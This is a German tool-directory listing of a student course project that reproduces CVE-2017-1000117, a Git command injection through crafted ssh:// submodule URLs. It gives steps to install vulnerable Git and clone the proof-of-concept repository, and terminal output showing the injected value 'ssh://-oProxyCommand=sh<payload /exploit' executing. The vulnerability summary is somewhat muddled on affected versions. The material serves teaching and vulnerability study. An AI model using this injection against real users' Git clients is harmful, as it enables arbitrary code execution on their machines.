Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2017-1000117 — CVE-2017-1000117-Schwachstellenreproduktion (PoC+Exp) | Kitploit
Tools/GitHubGitHub/anonymking/cve-2017-1000117
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationLernen & BildungLabs & Praxis
GitHubanonymking/cve-2017-1000117

CVE-2017-1000117

CVE-2017-1000117-Schwachstellenreproduktion (PoC+Exp)

Repository anzeigen
321vor 7 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2017-1000117

Projektbeschreibung

  • Eines der Themen der Cybersicherheits-Kursprojekte
  • Reproduktion der Sicherheitslücke CVE-2017-1000117 (PoC+Exp)
  • Git + SSH

Sicherheitslückenübersicht:

  • Sicherheitslückenname: Git-Befehlsinjektion
  • CNNVD-Nummer: CNNVD-201708-670
  • Schweregrad: Mittel
  • CVE-Nummer: CVE-2017-1000117
  • Sicherheitslückentyp: Befehlsinjektion
  • Veröffentlichungsdatum: 2017-08-16
  • Bedrohungstyp: Remote
  • Aktualisierungsdatum: 2017-10-17
  • Hersteller: git-scm
  • Quelle: TrevorJay
  • Sicherheitsbeschreibung: Git ist ein kostenloses, quelloffenes, verteiltes Versionskontrollsystem, das von dem US-amerikanischen Softwareentwickler Linus Torvalds entwickelt wurde. In Versionen vor Git 2.7.5 besteht eine Befehlssicherheitslücke. Ein entfernter Angreifer kann die Sicherheitslücke mittels einer speziell gestalteten 'ssh://...' URL ausnutzen, um beliebige Programme auf einem bereits abgemeldeten Gerät auszuführen.

Nutzungsprozess

  • Installieren Sie eine Git-Version, die innerhalb des anfälligen Bereichs liegt (Git für Linux, )
Git für Windows
  • Ich habe die Version git-2.12.1 gewählt (getestet unter Linux und Windows, die Version funktioniert auf beiden). Die Download-URLs für die entsprechende 2.12.1 Version sind: git-2.12.1.tar.gz für Linux und Git-2.12.1-64-bit.tar.bz2 für Windows.
  • Installieren Sie Git und klonen Sie das Projekt inklusive Submodule mit: git clone --recursive https://github.com/AnonymKing/CVE-2017-1000117.git
  • root@kitploit:~
    $ git clone --recursive https://github.com/AnonymKing/CVE-2017-1000117.git
    Cloning into 'CVE-2017-1000117'...
    remote: Enumerating objects: 14, done.
    remote: Counting objects: 100% (14/14), done.
    remote: Compressing objects: 100% (13/13), done.
    remote: Total 14 (delta 3), reused 8 (delta 0), pack-reused 0
    Unpacking objects: 100% (14/14), done.
    Submodule 'exploit' (ssh://-oProxyCommand=sh<payload /exploit) registered for path 'exploit'
    Cloning into 'C:/Users/AnonymKing/Desktop/Git-2.12.1-64-bit/test/CVE-2017-1000117/exploit'...
    Pseudo-terminal will not be allocated because stdin is not a terminal.
    
    
    *********************************************
                       _ooOoo_
                      o8888888o
                      88" . "88
                      (| -_- |)
                      O\  =  /O
                   ____/`---'\____
                 .'  \\|     |//  `.
                /  \\|||  :  |||//  \
               /  _||||| -:- |||||-  \
               |   | \\\  -  /// |   |
               | \_|  ''\---/''  |   |
               \  .-\__  `-`  ___/-. /
             ___`. .'  /--.--\  `. . __
          ."" '<  `.___\_<|>_/___.'  >'"".
         | | :  `- \`.;`\ _ /`;.`/ - ` : | |
         \  \ `-.   \_ __\ /__ _/   .-` /  /
    ======`-.____`-.___\_____/___.-`____.-'======
                       `=---='
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    
    ssh_exchange_identification: Connection closed by remote host
    fatal: Could not read from remote repository.
    
    Please make sure you have the correct access rights
    and the repository exists.
    fatal: clone of 'ssh://-oProxyCommand=sh<payload /exploit' into submodule path 'C:/Users/AnonymKing/Desktop/Git-2.12.1-64-bit/test/CVE-2017-1000117/exploit' failed
    Failed to clone 'exploit'. Retry scheduled
    
    • Wenn Sie den Buddha sehen, wurde die Sicherheitslücke erfolgreich reproduziert und der schädliche Code im Payload wurde ausgeführt.

    Update vom 21.06.2019 um 10:30

    • Beim Schreiben des Berichts fiel mir auf, dass diese Sicherheitslücke der CVE-2018-17456 sehr ähnlich ist, nur anders formuliert. Die Ursache ist in beiden Fällen, dass das Zeichen „-“ nicht korrekt interpretiert und fälschlicherweise als Parameter geparst wird, was zur Ausführung von beliebigem Code führt.
    • Bezüglich der Ausnutzung von CVE-2018-17456 kann dieser Blogbeitrag referenziert werden: [《Analyse der Git Submodule Sicherheitslücke (CVE-2018-17456)》](https://paper.seebug.org/716/](https://paper.seebug.org/716/)

    Update vom 21.06.2019 um 19:39

    • Bei der Recherche stieß ich auf eine weitere sehr ähnliche Sicherheitslücke, CVE-2018-11235
    • Zu CVE-2018-11235 finden sich hier einige Referenzartikel: CVE-2018-11235 git RCE, PoC exploit for CVE-2018-11235, Detaillierte Analyse der Git Remote Code Execution Sicherheitslücke (CVE-2018-11235)
    Tool herunterladen